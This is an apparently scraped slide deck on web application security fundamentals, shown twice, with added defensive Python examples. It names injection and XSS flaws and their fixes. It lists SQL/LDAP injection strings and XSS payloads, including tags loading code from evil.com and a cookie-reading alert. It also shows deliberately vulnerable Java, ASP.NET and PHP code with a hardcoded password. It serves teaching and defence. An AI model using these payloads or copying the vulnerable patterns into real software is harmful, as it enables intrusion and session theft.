Application and Website Security – Fundamental Edition
Daniel Owens
IT Security Professional
Agenda

 Course Introduction
 Common Input Validation Flaws
 Common Access Control Flaws
 Common Encryption Flaws
 Tools
 Conclusion And Appendices
Purpose

 Drum up interest


Session Prerequisites

 None
Communication Media and Security Concerns
 Communication media:
   'Wired' networks
   'Wireless' networks
 Security concerns:
   The Insider
   The Outsider
   The Technology
   Nature
A Note About Security

   Security helps functionality – if it doesn’t help
    functionality, it isn’t security.
                                           -Daniel Owens
Consequences of Poor Security

 Stolen intellectual property
 System downtime
 Lost productivity
 Damage to NASA's reputation
 Lost public confidence
 Lost revenue
 Congressional inquiries
Agenda

 Course Introduction
 Common Input Validation Flaws
 Common Access Control Flaws
 Common Encryption Flaws
 Tools
 Conclusion And Appendices
SQL | LDAP Injection

 SQL and LDAP Injection
   The injection of malicious code intended to
   bypass filtering and execute a query of the
   attacker's choosing
     Can be thwarted using strongly typed variables,
     parameterized statements, escaping, and whitelists
   Example Strings include:
     1'1
     %31%27%20%4F%52%20%27%31%27%3D%27%31
     &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
     *(|(mail=*))
Java SQL Injection

   import java.sql.Connection;
   import java.sql.DriverManager;
   import java.sql.ResultSet;
   import java.sql.Statement;

   public class Lookup {
     public static void main(String[] args) throws Exception {
       Connection conn = null;
       String username = args[0];
       String password = args[1];
       // Vulnerable: the user-supplied uid is concatenated straight into the SQL text
       String query = "SELECT uid, pass FROM users WHERE uid LIKE '" + username + "%'";
       conn = DriverManager.getConnection("jdbc:odbc:logistics", "admin", "LetMeIn");
       Statement stmnt = conn.createStatement();
       ResultSet rs = stmnt.executeQuery(query);
       …
     }
   }
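The same flaw and its fix, rebuilt as an added example in Python on an in-memory SQLite table so both can be run (this is not code from the slides; the users rows, the tampered input string and the whitelist pattern are constructed for the demo):

```python
import re
import sqlite3

# Constructed sample rows standing in for the slide's 'users' table.
SAMPLE_USERS = [("admin", "s3cr3t"), ("alice", "wonder"), ("bob", "builder")]

# Constructed whitelist for a uid: letters, digits and underscore only.
USERNAME_RE = re.compile(r"^[A-Za-z0-9_]{1,32}$")

# Constructed tampered input: closes the LIKE literal, adds an always-true
# condition, then re-opens a literal so the trailing %' still parses.
TAMPERED = "x%' OR 1=1 OR uid LIKE '"


def make_db():
    """Fresh in-memory database with the sample users loaded."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, username):
    """Mirrors the slide: the uid is pasted into the SQL text, so anything
    in it is parsed as SQL rather than treated as data."""
    query = "SELECT uid, pass FROM users WHERE uid LIKE '" + username + "%'"
    return conn.execute(query).fetchall()


def lookup_parameterized(conn, username):
    """Fix 1: a parameterized statement. The driver binds the value, so the
    tampered string is only ever compared as a LIKE pattern, never executed."""
    query = "SELECT uid, pass FROM users WHERE uid LIKE ?"
    return conn.execute(query, (username + "%",)).fetchall()


def is_valid_username(username):
    """Fix 2: whitelist the input before it goes anywhere near the database."""
    return bool(USERNAME_RE.match(username))


def lookup_safe(conn, username):
    """Both fixes together: reject out-of-policy input, then bind the value."""
    if not is_valid_username(username):
        raise ValueError("username rejected by whitelist")
    return lookup_parameterized(conn, username)


if __name__ == "__main__":
    db = make_db()
    print("vulnerable, tampered input:", lookup_vulnerable(db, TAMPERED))  # every row
    print("parameterized, tampered input:", lookup_parameterized(db, TAMPERED))  # []
    print("safe, 'ali':", lookup_safe(db, "ali"))
```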
Demonstration 1
    SQL Injection
Bypassing Security Checks
Case Study 1
SQL Injection
Owning Networks
Cross-Site Scripting (XSS)

 XSS
   The injection of client-side code
   Comes in three kinds:
     Persistent
     Non-Persistent
     DOM
   Only occurs when user input influences the
   output
     Can be stopped by assuming all input is malicious until
     proven otherwise through a whitelist
   Can lead to a complete system compromise – for
Cross-Site Scripting (cont.)

 XSS (cont.)
   Sample strings:
     <script src=http://evil.com/attack.js << </script <<
     <link rel="stylesheet" href=http://evil.com/attack.css>
     %3Cscript%3Epref%3Dfunction(a%2Cb){document.write(a%2B%22%20-%3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22)%3B}%3B%3C%2Fscript%3E%3Cscript%20src%3D%22view-source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall.js%22%3E%3C%2Fscript%3E
     <img src="" onMouseOver="alert(document.cookie)"; />
ASP.NET Cross-Site Scripting

   <%@ Page Language="C#"
      ValidateRequest="false" %>
   <html>
    <script runat="server">
     void btnSubmit_Click(Object sender, EventArgs e)
     {
       // Vulnerable: request validation is switched off above and the text
       // box value is written into the page without any output encoding
       Response.Write(txtString.Text);
     }
    </script>
ASP.NET Cross-Site Scripting (cont.)

   <body>
     <form id="form1" runat="server">
      <asp:TextBox id="txtString" runat="server"
              Text="<script>alert('hi');</script>" />
      <asp:Button id="btnSubmit" runat="server"
             OnClick="btnSubmit_Click"
             Text="Submit" />
     </form>
    </body>
   </html>
Demonstration 2
       XSS
    Having Fun
Remote File Include/Execution | Code Injection
 Remote File Include and Execution
   An attacker tricks the system into including and/or
   executing arbitrary files
 Code Injection
   An attacker tricks the system into executing arbitrary
   code by injecting the commands into the code
 Both
   Code of the attacker's choosing is executed
   Contrary to popular belief, ANY language can
   suffer this
PHP Remote File Include

   <?php
    ….
    // Vulnerable: both include paths come straight from the query string
    require_once($_GET['config']);
    require_once($_GET['base']."/index.php");
    ….
   ?>
ASP.NET Remote File Include

   <%
    ….
    ' Vulnerable: the URL to fetch comes straight from the query string and
    ' the fetched body is written to the client unchanged
    set url = Request.QueryString
    set xml = Server.CreateObject("Microsoft.XMLHTTP")
    xml.open "GET", url, false
    xml.send ""
    Response.write xml.responseText
    set xml = nothing
    ….
   %>
Hidden Elements | Cookies

 Hidden Elements and Cookies
   Hidden fields and cookies were merely intended
   to provide data storage without cluttering up the
   user's view
     They do not provide secure storage
     They are not immutable storage locations
   Neither should contain sensitive information
   Both should be considered malicious until proven
   otherwise
     Any data in it should not be directly used for output
     Whitelisting should be used to prove innocence
Hidden Elements | Cookies (cont.)

 Hidden Elements and Cookies (cont.)
     -575840793
     ReferrerUrl https://XXX.XXX.nasa.gov/CMTOOLS/Login.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspx
     TextError OnClick return confirm ... 'USERNAME (RandomData)'); return false;
     SetTargetText('ctl00_SimpleSearchForm_User2_InputFieldTextbox', 'USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)'); return;
     ctl00$SimpleSearchForm$User1$UserListGridView
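An added example (not from the slides) of the two rules the XSS and hidden-element slides give: treat every value as malicious until a whitelist proves otherwise, and never write input straight to the output. It mirrors the ASP.NET button handler above in Python; the second input string, the whitelists, the field names and the theme cookie are constructed for the demo.

```python
import html
import re

# The slide's own text box value, plus a constructed hidden-field value of the
# kind seen in the decoded hidden-element dump above.
SCRIPT_INPUT = "<script>alert('hi');</script>"
TAMPERED_USER = "USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)"

# Constructed whitelists: what each field is allowed to contain.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")
RECORD_ID_RE = re.compile(r"^[0-9]{1,9}$")
THEMES = {"light", "dark"}


def submit_click_vulnerable(text):
    """Mirrors Response.Write(txtString.Text): the input becomes markup as-is."""
    return "<p>" + text + "</p>"


def submit_click_safe(text):
    """Output encoding: <, >, &, double and single quotes become entities, so
    the browser renders the text instead of executing it."""
    return "<p>" + html.escape(text, quote=True) + "</p>"


def attribute_safe(name, value):
    """The same value placed inside an attribute: quote it and encode quotes,
    so the value cannot close the attribute and start an event handler."""
    return name + '="' + html.escape(value, quote=True) + '"'


def is_active_markup(rendered):
    """Crude check used by the demo: did a raw tag survive into the output?"""
    lowered = rendered.lower()
    return "<script" in lowered or "<a " in lowered


def valid_username(field_value):
    """Whitelist test for a hidden username field: innocence is proven, not
    assumed, and nothing is 'cleaned' on the way through."""
    return bool(USERNAME_RE.match(field_value))


def hidden_username(field_value):
    if not valid_username(field_value):
        raise ValueError("hidden username field rejected")
    return field_value


def hidden_record_id(field_value):
    """A hidden numeric id is parsed only after the whitelist passes, so the
    database never sees a string the client was free to rewrite."""
    if not RECORD_ID_RE.match(field_value):
        raise ValueError("hidden record id rejected")
    return int(field_value)


def cookie_theme(cookie_value):
    """Cookie values get the same treatment: anything outside the known set
    falls back to the default rather than reaching the output."""
    return cookie_value if cookie_value in THEMES else "light"


if __name__ == "__main__":
    print(submit_click_vulnerable(SCRIPT_INPUT))
    print(submit_click_safe(SCRIPT_INPUT))
    print(attribute_safe("value", TAMPERED_USER))
```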
Agenda

 Course Introduction
 Common Input Validation Flaws
 Common Access Control Flaws
 Common Encryption Flaws
 Tools
 Conclusion And Appendices
Session Hijacking – Cookie Theft

 Cookie Theft
   The theft of a client's cookies by an attacker
     Often possible because of other vulnerabilities –
     browser flaws (sandboxing), having TRACE enabled,
     XSS, etc.
   Can be hampered if mechanisms such as
   NONCEs are used
     NONCEs should be a set of characteristics unique to
     the specific session – client IP, server IP, server port,
     user agent string, and other key information
     Additional mechanisms include using secure cookies,
     but this has limited impact
Session Hijacking – Session Fixation
 Session Fixation
   An attacker uses a 'known' session ID
     Often, the attacker opens the session and keeps it
     open while attempting to convince a victim to log in
     using the known session
   This is often a phishing or other social
   engineering attack
   Can be hampered if session IDs are 'rekeyed' on
   login AND sessions expire and are removed
   quickly
   Difficult to stop if sessions are guessable
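An added example (not from the slides) of the countermeasures the two session-hijacking slides describe: binding a session to the client characteristics the cookie-theft slide lists, rekeying the session ID at login, and expiring and removing idle sessions. The timeout value, the fingerprint (client IP plus user agent) and the in-memory store are constructed for the demo.

```python
import secrets
import time

# Constructed policy: idle sessions are dropped after this many seconds.
IDLE_TIMEOUT = 15 * 60


class SessionStore:
    """In-memory session table keyed by an unguessable, random session ID."""

    def __init__(self, clock=time.time):
        self._clock = clock      # injectable so the demo can move time forward
        self._sessions = {}      # session id -> {"user", "fp", "last"}

    @staticmethod
    def _fingerprint(client_ip, user_agent):
        # The 'NONCE' characteristics from the slide. Binding to the client IP
        # also logs out legitimate users whose address changes (mobile, proxy
        # pools), so choose the set that fits the deployment.
        return (client_ip, user_agent)

    @staticmethod
    def _new_id():
        return secrets.token_urlsafe(32)   # 256 bits from the OS CSPRNG: not guessable

    def create(self, client_ip, user_agent):
        """Anonymous session issued before login."""
        sid = self._new_id()
        self._sessions[sid] = {"user": None,
                               "fp": self._fingerprint(client_ip, user_agent),
                               "last": self._clock()}
        return sid

    def get(self, sid, client_ip, user_agent):
        """Return the session record, or None if the ID is unknown, the client
        characteristics do not match, or the session has sat idle too long."""
        rec = self._sessions.get(sid)
        if rec is None:
            return None
        if rec["fp"] != self._fingerprint(client_ip, user_agent):
            return None                   # cookie presented from a different client
        if self._clock() - rec["last"] > IDLE_TIMEOUT:
            del self._sessions[sid]       # expired: remove it, do not just ignore it
            return None
        rec["last"] = self._clock()
        return rec

    def login(self, sid, client_ip, user_agent, user):
        """Authenticate and rekey: the pre-login ID (which an attacker may have
        planted via fixation) is destroyed and a fresh one is issued."""
        rec = self.get(sid, client_ip, user_agent)
        if rec is None:
            return None
        del self._sessions[sid]
        new_sid = self._new_id()
        self._sessions[new_sid] = {"user": user, "fp": rec["fp"], "last": self._clock()}
        return new_sid

    def sweep(self):
        """Periodic cleanup so expired sessions do not linger in the table."""
        now = self._clock()
        stale = [s for s, r in self._sessions.items() if now - r["last"] > IDLE_TIMEOUT]
        for s in stale:
            del self._sessions[s]
        return len(stale)
```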
Demonstration 3
Session Hijacking
  Session Fixation
Directory Traversal

 Directory Traversal
   An attacker is able to trick the system into
   traversing the directory structure
     In many instances, arbitrary files can be viewed
     Attackers are often attempting to execute a file or
     gather information
   If user input dictates the output, care must be
   taken to ensure the input is 'valid'
     Whitelists become invaluable
   In extreme cases, an attacker can actually use
   this to gain administrator access to the server
PHP Directory Traversal

   <?php
    ….
    // Vulnerable: the file name comes straight from the query string and is
    // used as a path, so '../' sequences walk out of the calendar directory
    $date=$_GET['date'];
    if($handle=fopen("calendar/$date","rb")){
      print(fread($handle,filesize("calendar/$date")));
      fclose($handle);
    }
    ….
   ?>
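An added example (not from the slides) of the whitelist the directory-traversal slide calls for, applied both to the calendar lookup above and to the remote-file-include slides earlier: the include name is mapped through a fixed table instead of being used as a path, and every resulting path is canonicalized and checked to still lie under the application directory. The directory names, the date format and the include table are constructed for the demo.

```python
import os
import re

# Constructed policy: a calendar entry is named by an ISO date and nothing else.
DATE_RE = re.compile(r"^[0-9]{4}-[0-9]{2}-[0-9]{2}$")

# Constructed include table for the require_once($_GET['config']) case: the
# client sends a short name, the server decides which file that means.
INCLUDES = {
    "default": "config/default.php",
    "admin": "config/admin.php",
}


def safe_join(base_dir, relative):
    """Join and canonicalize, then refuse anything that resolved outside base_dir.
    realpath collapses '..' and follows symlinks, so the check sees the real target."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, relative))
    if os.path.commonpath([base, target]) != base:
        return None
    return target


def resolve_calendar_file(base_dir, date):
    """Fixed form of the slide's fopen("calendar/$date"): whitelist the name
    first; the canonical-path check is defence in depth behind it."""
    if not DATE_RE.match(date):
        return None
    return safe_join(base_dir, os.path.join("calendar", date))


def resolve_include(base_dir, name):
    """Fixed form of the require_once($_GET[...]) slides: the client never
    supplies a path or URL, only a key into the server-side table."""
    relative = INCLUDES.get(name)
    if relative is None:
        return None
    return safe_join(base_dir, relative)


def read_calendar_entry(base_dir, date):
    """The read itself, for completeness: only reached with a vetted path."""
    path = resolve_calendar_file(base_dir, date)
    if path is None:
        raise ValueError("calendar request rejected")
    with open(path, "rb") as handle:
        return handle.read()
```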
Agenda

 Course Introduction
 Common Input Validation Flaws
 Common Access Control Flaws
 Common Encryption Flaws
 Tools
 Conclusion And Appendices
Session Hijacking – Spoofing

 Spoofing
   Pretending to be someone else, an attacker
   attempts to gain the victim's privileges
   Comes in three basic forms
     Blind (write-only)
     Half pipe (read-only)
     Full pipe
   Network configuration and other protection
   mechanisms can make this difficult to defeat
   (both for the attacker and for the developer)
Demonstration 4
Session Hijacking
     Spoofing
Case Study 2
Session Hijacking
     Spoofing
Weak Encryption | Using Encoding

 Weak/Home-Grown Encryption
   The use of weak and home-grown encryption has
   led to the compromise of many systems
     It is also what makes session hijacking via
     spoofing and man-in-the-middle with bucket brigade
     and substitution attacks so trivial
 Encoding
   The use of algorithms that take output and simply
   change the format (normally it is the number of
   bits used per character)
     This is not secure by any means
Case Study 3
Weak Encryption | Encoding
   XOR
   SHA
   Base64
Agenda

 Course Introduction
 Common Input Validation Flaws
 Common Access Control Flaws
 Common Encryption Flaws
 Tools
 Conclusion and Appendices
Security Compass

 XSS-Me
   A free Firefox plug-in
   Performs semi-automated XSS attacks against
   POST fields
 SQL Inject-Me
   A free Firefox plug-in
   Performs semi-automated SQL injection attacks
   against POST fields
 Access-Me
   A free Firefox plug-in…
Other Firefox Add-ons

 Web Developer Add-on
   Free
   Lets you view source files cleanly and easily
   Lets you quickly enable and disable things (like
   cookies, JavaScript, and Meta Refresh)
   Lets you view and modify form fields and cookie
   data
 Tamper Data
   Free
   Lets you modify most request data
Fuzzers

 BED.pl
   Free Perl script
   Performs basic tests of your SERVER
 JBroFuzz
   Free Java application
   Lets you fuzz any part of an HTTP/HTTPS
   request in a semi-automated fashion
 Powerfuzzer
   Free and commercial versions (Python script)
   Easy and multi-talented… automated
Other Tools

 Sothink SWF Decompiler
   Decompiles any Adobe Flash or Flux script
 Cavaj
   Free
   Decompiles any Java program
 Nikto
   Free
   Provides scans of the website looking for
   common, basic vulnerabilities and
   misconfigurations
Agenda

 Course Introduction
 Common Input Validation Flaws
 Common Access Control Flaws
 Common Encryption Flaws
 Tools
 Conclusion And Appendices
For More Information

 Microsoft Security Site (all audiences)
   http://www.microsoft.com/security
 MSDN Security Site (developers)
   http://msdn.microsoft.com/security
 TechNet Security Site (IT professionals)
   http://www.microsoft.com/technet/security
 SANS Top-20 (IT Professionals)
   http://www.sans.org/top20/
For More Information (cont.)

 Common Weakness Enumeration (CWE)/SANS Top 25 Most Dangerous Programming Errors (developers)
   http://cwe.mitre.org/top25/index.html
 GRC IT Security Office
   http://itsecurity.grc.nasa.gov
 Most Common Software Errors
   http://discussweb.com/software-testing/803-most-common-software-errors.html
Acknowledgements

 I stole the background from Microsoft
 I stole a lot from my experiences and
 previous writings
VICTOR MAESTRE RAMIREZ
 
HCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser EnvironmentsHCL Nomad Web – Best Practices and Managing Multiuser Environments
HCL Nomad Web – Best Practices and Managing Multiuser Environments
panagenda
 
Ad

Application and Website Security -- Fundamental Edition

  • 1. Application and Website Security – Fundamental Edition
    Daniel Owens, IT Security Professional
  • 2. Agenda
    - Course Introduction
    - Common Input Validation Flaws
    - Common Access Control Flaws
    - Common Encryption Flaws
    - Tools
    - Conclusion And Appendices
  • 3. Purpose
    - Drum up interest
    Session Prerequisites
    - None
  • 4. Communication Media and Security Concerns
    - Communication media:
      - 'Wired' networks
      - 'Wireless' networks
    - Security concerns:
      - The Insider
      - The Outsider
      - The Technology
      - Nature
  • 5. A Note About Security
    Security helps functionality – if it doesn't help functionality, it isn't security.
    -Daniel Owens
  • 6. Consequences of Poor Security
    - Stolen intellectual property
    - System downtime
    - Lost productivity
    - Damage to NASA's reputation
    - Lost public confidence
    - Lost revenue
    - Congressional inquiries
  • 7. Agenda
    - Course Introduction
    - Common Input Validation Flaws
    - Common Access Control Flaws
    - Common Encryption Flaws
    - Tools
    - Conclusion And Appendices
  • 8. SQL | LDAP Injection
    - SQL and LDAP Injection
      - The injection of malicious code intended to bypass filtering and execute a query of the attacker's choosing
        - Can be thwarted using strongly typed variables, parameterized statements, escaping, and whitelists
      - Example strings include:
        - 1'1
        - %31%27%20%4F%52%20%27%31%27%3D%27%31
        - &#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49
        - *(|(mail=*))
  • 9. Java SQL Injection
      import java.sql.*;

      public class Lookup {
        public static void main(String[] args) throws SQLException {
          Connection conn = null;
          String username = args[0];
          String password = args[1];
          // Vulnerable: the user-supplied prefix is concatenated straight into the query text
          String query = "SELECT uid, pass FROM users WHERE uid LIKE '" + username + "%'";
          conn = DriverManager.getConnection("jdbc:odbc:logistics", "admin", "LetMeIn");
          Statement stmnt = conn.createStatement();
          ResultSet rs = stmnt.executeQuery(query);
          …
        }
      }
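    Added example (Python with sqlite3, not the deck's Java/JDBC and not the author's code): it decodes slide 8's URL-encoded and entity-encoded strings to show they are one and the same payload, then puts the concatenated query shape of slide 9 beside a parameterized version and a whitelisted one. The users table, its rows and the `%' OR '1'='1` variant (slide 8's string adjusted to this query's quoting) are constructed here.

```python
import html
import re
import sqlite3
from urllib.parse import unquote

# Slide 8's two encodings of one injection string (URL-encoded and HTML entities).
URL_ENCODED = "%31%27%20%4F%52%20%27%31%27%3D%27%31"
ENTITY_ENCODED = "&#49&#39&#32&#79&#82&#32&#39&#49&#39&#61&#39&#49"

def canonicalize(raw):
    """Decode URL and HTML-entity forms first; validation must see the real value."""
    return html.unescape(unquote(raw))

def make_db():
    # Constructed in-memory stand-in for the slide's "users" table.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (uid TEXT, pass TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?)",
                     [("admin", "x7!pQ"), ("bob", "r2d2c3po")])
    return conn

def lookup_vulnerable(conn, username):
    # Same shape as slide 9's Java: the input is spliced into the query text.
    query = "SELECT uid, pass FROM users WHERE uid LIKE '" + username + "%'"
    return conn.execute(query).fetchall()

def lookup_parameterized(conn, username):
    # The input is bound as a value; quotes inside it never reach the SQL parser.
    query = "SELECT uid, pass FROM users WHERE uid LIKE ?"
    return conn.execute(query, (username + "%",)).fetchall()

USERNAME_RE = re.compile(r"[A-Za-z0-9_]{1,32}")

def lookup_whitelisted(conn, raw_username):
    # Strong typing via a whitelist on the *decoded* value, then bind it.
    username = canonicalize(raw_username)
    if not USERNAME_RE.fullmatch(username):
        raise ValueError("username rejected by whitelist")
    return lookup_parameterized(conn, username)
```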
  • 10. Demonstration 1
    SQL Injection
    Bypassing Security Checks
  • 11. Case Study 1
    SQL Injection
    Owning Networks
  • 12. Cross-Site Scripting (XSS)
    - XSS
      - The injection of client-side code
      - Comes in three kinds:
        - Persistent
        - Non-Persistent
        - DOM
      - Only occurs when user input influences the output
      - Can be stopped by assuming all input is malicious until proven otherwise through a whitelist
      - Can lead to a complete system compromise – for
  • 13. Cross-Site Scripting (cont.)
    - XSS (cont.)
      - Sample strings:
        - <script src=http://evil.com/attack.js << </script <<
        - <link rel="stylesheet" href=http://evil.com/attack.css>
        - %3Cscript%3Epref%3Dfunction(a%2Cb){document.write(a%2B%22%20-%3E%20%22%2Bb%2B%22%3Cbr%20%2F%3E%22)%3B}%3B%3C%2Fscript%3E%3Cscript%20src%3D%22view-source%3Aresource%3A%2F%2F%2Fgreprefs%2Fall.js%22%3E%3C%2Fscript%3E
        - <img src="" onMouseOver="alert(document.cookie)"; />
  • 14. ASP.NET Cross-Site Scripting
      <%@ Page Language="C#" ValidateRequest="false" %>
      <html>
      <script runat="server">
        // Vulnerable: the text box value is written to the response without encoding
        void btnSubmit_Click(Object sender, EventArgs e) {
          Response.Write(txtString.Text);
        }
      </script>
      // CONTINUED ON NEXT SLIDE
  • 15. ASP.NET Cross-Site Scripting (cont.)
      // CONTINUED FROM PREVIOUS SLIDE
      <body>
      <form id="form1" runat="server">
        <asp:TextBox id="txtString" runat="server" Text="<script>alert('hi');</script>" />
        <asp:Button id="btnSubmit" runat="server" OnClick="btnSubmit_Click" Text="Submit" />
      </form>
      </body>
      </html>
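    Added example in Python (not the deck's ASP.NET, and not the author's code) of the defence slides 12 to 15 describe: encoding untrusted text for the HTML context it lands in, and whitelisting a field before output. SCRIPT_PAYLOAD is slide 15's text box value; ATTR_PAYLOAD is a constructed attribute-context variant of slide 13's onMouseOver string; the DISPLAY_NAME_RE whitelist is an assumption.

```python
import html
import re

# Slide 15's payload, and a constructed attribute-breakout variant of slide 13's.
SCRIPT_PAYLOAD = "<script>alert('hi');</script>"
ATTR_PAYLOAD = '" onMouseOver="alert(document.cookie)'

def render_text(untrusted):
    """Untrusted value placed in an HTML text node: encode &, <, > and both quotes."""
    return "<p>" + html.escape(untrusted, quote=True) + "</p>"

def render_attr(name, untrusted):
    """Untrusted value placed inside a double-quoted attribute. quote=True turns a
    stray " into &quot; so the input cannot close the attribute and add an event
    handler of its own; the attribute itself must actually be quoted for this to hold."""
    return '<input name="%s" value="%s" />' % (name, html.escape(untrusted, quote=True))

DISPLAY_NAME_RE = re.compile(r"[A-Za-z0-9 _.-]{1,40}")

def render_display_name(untrusted):
    """Slide 12's rule: treat input as malicious until a whitelist proves otherwise,
    then still encode for the output context."""
    if not DISPLAY_NAME_RE.fullmatch(untrusted):
        raise ValueError("display name rejected by whitelist")
    return render_text(untrusted)
```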
  • 16. Demonstration 2
    XSS
    Having Fun
  • 17. Remote File Include/Execution | Code Injection
    - Remote File Include and Execution
      - An attacker tricks the system into including and/or executing arbitrary files
    - Code Injection
      - Attacker tricks the system into executing arbitrary code by injecting the commands into the code
    - Both
      - Code of the attacker's choosing is executed
      - Contrary to popular belief, ANY language can suffer this
  • 18. PHP Remote File Include
      <?php
      ....
      // Vulnerable: both include paths come straight from the query string
      require_once($_GET['config']);
      require_once($_GET['base']."/index.php");
      ....
      ?>
  • 19. ASP.NET Remote File Include
      <%
      ....
      url = Request.QueryString
      Set xml = Server.CreateObject("Microsoft.XMLHTTP")
      ' Vulnerable: the URL to fetch is taken from the request and its body echoed back
      xml.open "GET", url, False
      xml.send ""
      Response.Write xml.responseText
      Set xml = Nothing
      ....
      %>
  • 20. Hidden Elements | Cookies
    - Hidden Elements and Cookies
      - Hidden fields and cookies were merely intended to provide data storage without cluttering up the user's view
      - They do not provide secure storage
      - They are not immutable storage locations
      - Neither should contain sensitive information
      - Both should be considered malicious until proven otherwise
        - Any data in it should not be directly used for output
        - Whitelisting should be used to prove innocence
  • 21. Hidden Elements | Cookies (cont.)
    - Hidden Elements and Cookies (cont.)
      Sample hidden-field contents (as shown on the slide):
        -575840793 ReferrerUrlQhttps://XXX.XXX.nasa.gov/CMTOOLS/Login.aspx?ReturnUrl=/CMTOOLS/ErrorPage.aspx TextErrorddOnClickreturnconfirm ... 'USERNAME (RandomData)'); return false;ddhSetTargetText('ctl00_SimpleSearchForm_User2_InputFieldTextbox', 'USERNAME (<a href=pizza.gov>pizza is good for you</a>USERACCOUNT)'); return; fd-ctl00$SimpleSearchForm$User1$UserListGridView<+ fd
  • 22. Agenda
    - Course Introduction
    - Common Input Validation Flaws
    - Common Access Control Flaws
    - Common Encryption Flaws
    - Tools
    - Conclusion And Appendices
  • 23. Session Hijacking – Cookie Theft
    - Cookie Theft
      - The theft of a client's cookies by an attacker
      - Often possible because of other vulnerabilities – browser flaws (sandboxing), having TRACE enabled, XSS, etc.
      - Can be hampered if mechanisms such as NONCEs are used
        - NONCEs should be a set of characteristics unique to the specific session – client IP, server IP, server port, user agent string, and other key information
      - Additional mechanisms include using secure cookies, but this has limited impact
  • 24. Session Hijacking – Session Fixation
    - Session Fixation
      - An attacker uses a 'known' session ID
      - Often, the attacker opens the session and keeps it open while attempting to convince a victim to login using the known session
        - This is often a phishing or other social engineering attack
      - Can be hampered if session IDs are 'rekeyed' on login AND sessions expire and are removed quickly
      - Difficult to stop if sessions are guessable
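    Added example in Python (not from the deck and not the author's code) of the controls slides 23 and 24 call for: an in-memory session store that binds each session ID to the characteristics slide 23 lists (client IP, server IP, server port, user agent) through an HMAC nonce, idles quiet sessions out, and rekeys the ID on login. SERVER_KEY, MAX_IDLE_SECONDS and the client tuples are constructed assumptions.

```python
import hashlib
import hmac
import secrets

SERVER_KEY = secrets.token_bytes(32)   # per-deployment secret; generated here for the demo
MAX_IDLE_SECONDS = 900                 # quiet sessions expire and are removed quickly

def session_nonce(sid, client):
    """Slide 23's NONCE: an HMAC over this session's characteristics.
    client = (client_ip, server_ip, server_port, user_agent)."""
    msg = "|".join([sid] + [str(part) for part in client]).encode()
    return hmac.new(SERVER_KEY, msg, hashlib.sha256).hexdigest()

class SessionStore:
    def __init__(self):
        self._sessions = {}   # sid -> {"user", "nonce", "last_seen"}

    def _issue(self, user, client, now):
        sid = secrets.token_urlsafe(32)   # unguessable, so fixation cannot rely on guessing IDs
        self._sessions[sid] = {"user": user, "nonce": session_nonce(sid, client), "last_seen": now}
        return sid

    def create(self, client, now):
        return self._issue(None, client, now)

    def validate(self, sid, client, now):
        """Accept the cookie only if the ID exists, has not idled out, and the presenting
        client still matches the characteristics the ID was issued to."""
        entry = self._sessions.get(sid)
        if entry is None:
            return False
        if now - entry["last_seen"] > MAX_IDLE_SECONDS:
            del self._sessions[sid]
            return False
        if not hmac.compare_digest(entry["nonce"], session_nonce(sid, client)):
            return False
        entry["last_seen"] = now
        return True

    def login(self, sid, user, client, now):
        """Rekey on login (slide 24): the ID the browser arrived with, possibly planted
        by an attacker, is discarded and a fresh one is issued to the authenticated user."""
        if not self.validate(sid, client, now):
            raise PermissionError("unknown, expired or mismatched session")
        del self._sessions[sid]
        return self._issue(user, client, now)

    def user(self, sid):
        return self._sessions[sid]["user"]
```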
  • 26. Directory Traversal
    - Directory Traversal
      - An attacker is able to trick the system into traversing the directory structure
      - In many instances, arbitrary files can be viewed
      - Attackers are often attempting to execute a file or gather information
      - If user input dictates the output, care must be taken to ensure the input is 'valid'
        - Whitelists become invaluable
      - In extreme cases, an attacker can actually use this to gain administrator access to the server
  • 27. PHP Directory Traversal
      <?php
      ....
      $date = $_GET['date'];
      // Vulnerable: $date is used as a path component without any validation
      if ($handle = fopen("calendar/$date", "rb")) {
          print(fread($handle, filesize("calendar/$date")));
          fclose($handle);
      }
      ....
      ?>
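    Added example in Python (not the deck's PHP and not the author's code): the calendar/$date lookup from slide 27 rebuilt with the whitelist slide 26 calls for, plus a second check that the resolved path stays inside the calendar directory. The YYYY-MM-DD whitelist is an assumption; demo() builds a constructed directory layout in a temporary directory.

```python
import os
import re
import tempfile

DATE_RE = re.compile(r"\d{4}-\d{2}-\d{2}")   # the only shape a calendar name may take

def confine(base_dir, user_path):
    """Resolve base_dir/user_path and refuse anything that ends up outside base_dir."""
    base = os.path.realpath(base_dir)
    target = os.path.realpath(os.path.join(base, user_path))
    if os.path.commonpath([base, target]) != base:
        raise ValueError("path escapes %s" % base_dir)
    return target

def safe_calendar_path(base_dir, date):
    """Slide 27's calendar/$date lookup: whitelist the name, then confine the path."""
    if not DATE_RE.fullmatch(date):
        raise ValueError("date rejected by whitelist")
    return confine(base_dir, date)

def read_calendar(base_dir, date):
    with open(safe_calendar_path(base_dir, date), "rb") as fh:
        return fh.read()

def demo():
    """Constructed layout: <tmp>/calendar/2024-05-01 and <tmp>/config.php beside it."""
    root = tempfile.mkdtemp()
    cal = os.path.join(root, "calendar")
    os.mkdir(cal)
    with open(os.path.join(cal, "2024-05-01"), "wb") as fh:
        fh.write(b"meeting 09:00")
    with open(os.path.join(root, "config.php"), "wb") as fh:
        fh.write(b"<?php /* constructed */ ?>")
    results = {"good": read_calendar(cal, "2024-05-01")}
    # Each layer rejects the traversal on its own; in safe_calendar_path both apply.
    for label, check in (("whitelist", lambda p: safe_calendar_path(cal, p)),
                         ("confine", lambda p: confine(cal, p))):
        try:
            check("../config.php")
            results[label] = "served"
        except ValueError:
            results[label] = "rejected"
    return results
```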
  • 28. Agenda
    - Course Introduction
    - Common Input Validation Flaws
